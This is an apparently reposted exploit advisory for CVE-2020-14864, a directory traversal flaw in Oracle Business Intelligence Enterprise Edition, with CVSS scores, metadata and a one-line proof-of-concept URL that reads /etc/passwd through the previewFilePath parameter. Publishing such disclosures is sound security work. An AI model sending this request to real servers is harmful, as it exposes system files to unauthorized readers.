Oracle Business Intelligence Enterprise 12.2.1.4.0 LFI
2020-10-30 03:50:08 Author: cxsecurity.com(查看原文) 阅读量:141 收藏

Oracle Business Intelligence Enterprise 12.2.1.4.0 LFI

CVSS Base Score: 7.8/10

Impact Subscore: 6.9/10

Exploitability Subscore: 10/10

Exploit range: Remote

Attack complexity: Low

Authentication: No required

Confidentiality impact: Complete

Integrity impact: None

Availability impact: None

# Exploit Title: Oracle Business Intelligence Enterprise Edition 5.5.0.0.0 / 12.2.1.3.0 / 12.2.1.4.0 - 'getPreviewImage' Directory Traversal/Local File Inclusion # Date: 2020-10-27 # Exploit Author: Ivo Palazzolo (@palaziv) # Reference: https://www.oracle.com/security-alerts/cpuoct2020.html # Vendor Homepage: https://www.oracle.com # Software Link: https://www.oracle.com/middleware/technologies/bi-enterprise-edition-downloads.html # Version: 5.5.0.0.0, 12.2.1.3.0, 12.2.1.4.0 # Tested on: SUSE Linux Enterprise Server # CVE: CVE-2020-14864 # Description A Directory Traversal vulnerability has been discovered in the 'getPreviewImage' function of Oracle Business Intelligence Enterprise Edition. The 'getPreviewImage' function is used to get a preview image of a previously uploaded theme logo. By manipulating the 'previewFilePath' URL parameter an attacker with access to the administration interface is able to read arbitrary system files. # PoC https://TARGET/analytics/saw.dll?getPreviewImage&previewFilePath=/etc/passwd



 

Thanks for you comment!
Your message is in quarantine 48 hours.

{{ x.nick }}

|

Date:

{{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1


{{ x.comment }}


文章来源: https://cxsecurity.com/issue/WLB-2020100193
如有侵权请联系:admin#unsafe.sh